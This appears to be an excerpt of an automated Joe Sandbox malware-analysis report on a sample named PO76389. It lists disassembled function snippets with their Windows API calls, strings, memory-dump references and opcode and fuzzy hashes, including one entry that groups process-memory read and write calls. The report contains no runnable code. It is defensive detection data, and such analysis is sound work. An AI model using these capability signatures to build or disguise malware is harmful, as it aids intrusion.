                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                    • String ID: @
                                                    • API String ID: 4150878124-2766056989
                                                    • Opcode ID: f7f813f49b3fc29fff1086f5ec1559d929bb18d224f0dd3742adadd084179e12
                                                    • Instruction ID: 21aceaac69b9941f7e9ae911cac0bd378385d363bbc86f19bd88793450072967
                                                    • Opcode Fuzzy Hash: f7f813f49b3fc29fff1086f5ec1559d929bb18d224f0dd3742adadd084179e12
                                                    • Instruction Fuzzy Hash: 4C416C7290021CAEDB10DFA4CC81AEFB7B8EF49704F04409AEA55B7291CA746E45CB64
                                                    APIs
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0054DBF0,00000000,?,?,?,?), ref: 0051A4E6
                                                    • GetWindowLongW.USER32 ref: 0051A503
                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0051A513
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Window$Long
                                                    • String ID: SysTreeView32
                                                    • API String ID: 847901565-1698111956
                                                    • Opcode ID: 056392505b7f366a77666a4481cf3f022a4604bd9dc0c363881967c102564564
                                                    • Instruction ID: 27394786b2b722c8c60533547c54da31972d99baffdef47e4786097636d27321
                                                    • Opcode Fuzzy Hash: 056392505b7f366a77666a4481cf3f022a4604bd9dc0c363881967c102564564
                                                    • Instruction Fuzzy Hash: C331D235201605AFEF129E38CC45BE67BA9FB49338F214719F875932E0C774E8A0AB51
                                                    APIs
                                                    • _memset.LIBCMT ref: 005057E7
                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 0050581D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CrackInternet_memset
                                                    • String ID: ?KP$|
                                                    • API String ID: 1413715105-1839330679
                                                    • Opcode ID: b33c152de6e1ea51c37a6d843b7f8feecd552215c2056828e084a4c2d3fb8537
                                                    • Instruction ID: 9ecf2896b58f868fd4650635d82d6107214ce82dfadcaf73d88e16abec920632
                                                    • Opcode Fuzzy Hash: b33c152de6e1ea51c37a6d843b7f8feecd552215c2056828e084a4c2d3fb8537
                                                    • Instruction Fuzzy Hash: 35311871C00119EBCF11AFA1CC95AEFBFB9FF18344F10801AF815A6162EA359A06DB64
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0051A74F
                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0051A75D
                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0051A764
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$DestroyWindow
                                                    • String ID: msctls_updown32
                                                    • API String ID: 4014797782-2298589950
                                                    • Opcode ID: f81144b328c2668f7bd158f081551aa9653f6194556104f9cd5b898212b847e4
                                                    • Instruction ID: 911e9b7b34e0d7ed8fbf67c59a619cf0f21ca725fb3d55e1311b2e7f5a75a767
                                                    • Opcode Fuzzy Hash: f81144b328c2668f7bd158f081551aa9653f6194556104f9cd5b898212b847e4
                                                    • Instruction Fuzzy Hash: 9921DEB5600605AFEB01DF28DCC1EA73BBCFB9A394B040009F9059B391CB70EC51DA61
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0051983D
                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 0051984D
                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00519872
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$MoveWindow
                                                    • String ID: Listbox
                                                    • API String ID: 3315199576-2633736733
                                                    • Opcode ID: f9f3cd723e16b91658b251a842fe812c679b4bf33bfe5c2dd14963d435fde6eb
                                                    • Instruction ID: 09cfa4b96b5a806041b368e42733e283c6fcc279bc5a06ce721eb7596a6b7e40
                                                    • Opcode Fuzzy Hash: f9f3cd723e16b91658b251a842fe812c679b4bf33bfe5c2dd14963d435fde6eb
                                                    • Instruction Fuzzy Hash: C421D032610118BBEB118F54DC85FEB3BAAFF8A754F018128F9159B190C6719C919BA0
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0051A27B
                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0051A290
                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0051A29D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: msctls_trackbar32
                                                    • API String ID: 3850602802-1010561917
                                                    • Opcode ID: 426db9daa25d880842e04d5e2ef77b08fa55b98b90f8021ee9fd550817430f25
                                                    • Instruction ID: 09e9c6582a8e06fc35bfdeb17629f7b8a76d5b005e0a575795a3ead637f73a39
                                                    • Opcode Fuzzy Hash: 426db9daa25d880842e04d5e2ef77b08fa55b98b90f8021ee9fd550817430f25
                                                    • Instruction Fuzzy Hash: 2211E375200208BBEF215F65CC46FE73FA8FF89B54F014118FA55A6090D272A891DB60
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 004D2F79
                                                    • GetProcAddress.KERNEL32(00000000), ref: 004D2F80
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: RoInitialize$combase.dll
                                                    • API String ID: 2574300362-340411864
                                                    • Opcode ID: 17e9319dbd09a53a9fc8eb401870e523996eee7bc4e0afa8b3a422b088c86b0c
                                                    • Instruction ID: 353955e52a824bfc9d928af7dba3d68e990f8ca3a17b44d9e8d86fb3b068c90c
                                                    • Opcode Fuzzy Hash: 17e9319dbd09a53a9fc8eb401870e523996eee7bc4e0afa8b3a422b088c86b0c
                                                    • Instruction Fuzzy Hash: 4EE0C270A94300AADA105B64FD49B167AB4A720706F401425F106E22E0DBB94098FF18
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,004D2F4E), ref: 004D304E
                                                    • GetProcAddress.KERNEL32(00000000), ref: 004D3055
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: RoUninitialize$combase.dll
                                                    • API String ID: 2574300362-2819208100
                                                    • Opcode ID: b78e26925ed519c767e7ba57bf72eedff48ffa737a6d4f1f848ba4b5165cfa28
                                                    • Instruction ID: 8129a3b47c586f42c1870f28e7172eabea5d6a8613db9c3186397a59161edf67
                                                    • Opcode Fuzzy Hash: b78e26925ed519c767e7ba57bf72eedff48ffa737a6d4f1f848ba4b5165cfa28
                                                    • Instruction Fuzzy Hash: D9E092B0644200EBDB615F61BE0DB063AB8B720702F501025F10DE22F0DBF94558FA29
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: LocalTime__swprintf
                                                    • String ID: %.3d$WIN_XPe
                                                    • API String ID: 2070861257-2409531811
                                                    • Opcode ID: 68272c702728b758ea05e89ad08aabafaaf5b7f1261e3d3012249a38d055ae37
                                                    • Instruction ID: f62247e1100051567d4c51561461953565157a370e0e1f2835d022e2f456bf09
                                                    • Opcode Fuzzy Hash: 68272c702728b758ea05e89ad08aabafaaf5b7f1261e3d3012249a38d055ae37
                                                    • Instruction Fuzzy Hash: 40E01275C0802CEAD754C6D1AD069BA7B7CBF15300F148893BD1692080D7359B58AB22
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,005120EC,?,005122E0), ref: 00512104
                                                    • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00512116
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: GetProcessId$kernel32.dll
                                                    • API String ID: 2574300362-399901964
                                                    • Opcode ID: bb915afa7f9c779fdbd309b7a1b19fe424adc786b6a3fa608db24983c0bb6b93
                                                    • Instruction ID: 0a336335eadef11a33c2a2e8f5115a329c750c75418b7e9a77d014a9526752a9
                                                    • Opcode Fuzzy Hash: bb915afa7f9c779fdbd309b7a1b19fe424adc786b6a3fa608db24983c0bb6b93
                                                    • Instruction Fuzzy Hash: 98D0A7345407129FEB209F71F80D6423EF8BB24300F004429E64AD2254D770C8C0CA60
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,004CE6D9,?,004CE55B,0054DC28,?,?), ref: 004CE6F1
                                                    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 004CE703
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: IsWow64Process$kernel32.dll
                                                    • API String ID: 2574300362-3024904723
                                                    • Opcode ID: 1f28fbeb58b87b2379a67781c5f630b53712b05f0a52261c9f87084376355eb7
                                                    • Instruction ID: 5b59de5e865ea88702e34319b5654a0961a002fc642659d175537ff0bcaa036a
                                                    • Opcode Fuzzy Hash: 1f28fbeb58b87b2379a67781c5f630b53712b05f0a52261c9f87084376355eb7
                                                    • Instruction Fuzzy Hash: D3D05238A00B128BDB602BA2A848A133FF8BB14300F00442EE495D2390DBB8C880CBA0
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,004CE69C,75920AE0,004CE5AC,0054DC28,?,?), ref: 004CE6B4
                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 004CE6C6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                    • API String ID: 2574300362-192647395
                                                    • Opcode ID: 7a2c4108e49a8052d448c801c2605b4ab9467f1cc61abe9e3bea8318233fe828
                                                    • Instruction ID: d993cee80cb193692ca2146a59ecd6fa89d5361138abbd317d75594e6deb0824
                                                    • Opcode Fuzzy Hash: 7a2c4108e49a8052d448c801c2605b4ab9467f1cc61abe9e3bea8318233fe828
                                                    • Instruction Fuzzy Hash: A7D0A7386107128FD7205F32F809B133AF8BB34301F00542EE445D2360D774C880D664
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,0050EBAF,?,0050EAAC), ref: 0050EBC7
                                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0050EBD9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                    • API String ID: 2574300362-1816364905
                                                    • Opcode ID: 75544a4d1643bbb67e92880326d3677e5b111faa278993105027ddf89525757a
                                                    • Instruction ID: bd38d30d58307c34e3368bb26dd4145d6cddf042c980be476891516073e267cc
                                                    • Opcode Fuzzy Hash: 75544a4d1643bbb67e92880326d3677e5b111faa278993105027ddf89525757a
                                                    • Instruction Fuzzy Hash: 39D0C7745047129FDB205F75F849A557EFCBB14715F208829F456D23A0DF70DC84DA60
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(oleaut32.dll,?,004F135F,?,004F1440), ref: 004F1389
                                                    • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 004F139B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                    • API String ID: 2574300362-1071820185
                                                    • Opcode ID: d02f183684d7adc908fced94e90b0b9b31c23d0a50f4b07a0d2d66385b1d8df8
                                                    • Instruction ID: ebaf64f3a8d3bc1bd9e2f8e0ecf884b802d8a30726e403f9526175a7e22ae421
                                                    • Opcode Fuzzy Hash: d02f183684d7adc908fced94e90b0b9b31c23d0a50f4b07a0d2d66385b1d8df8
                                                    • Instruction Fuzzy Hash: 70D05E348003129FE7200B64E8086523AF4AF24314B05441AE985D2760D674D488E664
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,004F1371,?,004F1519), ref: 004F13B4
                                                    • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 004F13C6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                    • API String ID: 2574300362-1587604923
                                                    • Opcode ID: 5c603d90bd0edb09299c8c9d7c06700f45de88748e09a64b67926b0bfbebcd66
                                                    • Instruction ID: 21081039b07df75284270e4c220529981e3a5facb7128cd629dd078d13907d02
                                                    • Opcode Fuzzy Hash: 5c603d90bd0edb09299c8c9d7c06700f45de88748e09a64b67926b0bfbebcd66
                                                    • Instruction Fuzzy Hash: BFD0A930804712DFE7240F34F8086127AF8BB50314F00442AEA95D2770DAB8C888DBA0
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00513AC2,?,00513CF7), ref: 00513ADA
                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00513AEC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                    • API String ID: 2574300362-4033151799
                                                    • Opcode ID: 9074ecf2a4e3e2ffdc9bf36bd8929ae029da9b963117b64fc276eabeb176b999
                                                    • Instruction ID: ae7f071e3f54c44ac3638117ce29e7f4b0257583c9aa59ff3a08b8a31874e205
                                                    • Opcode Fuzzy Hash: 9074ecf2a4e3e2ffdc9bf36bd8929ae029da9b963117b64fc276eabeb176b999
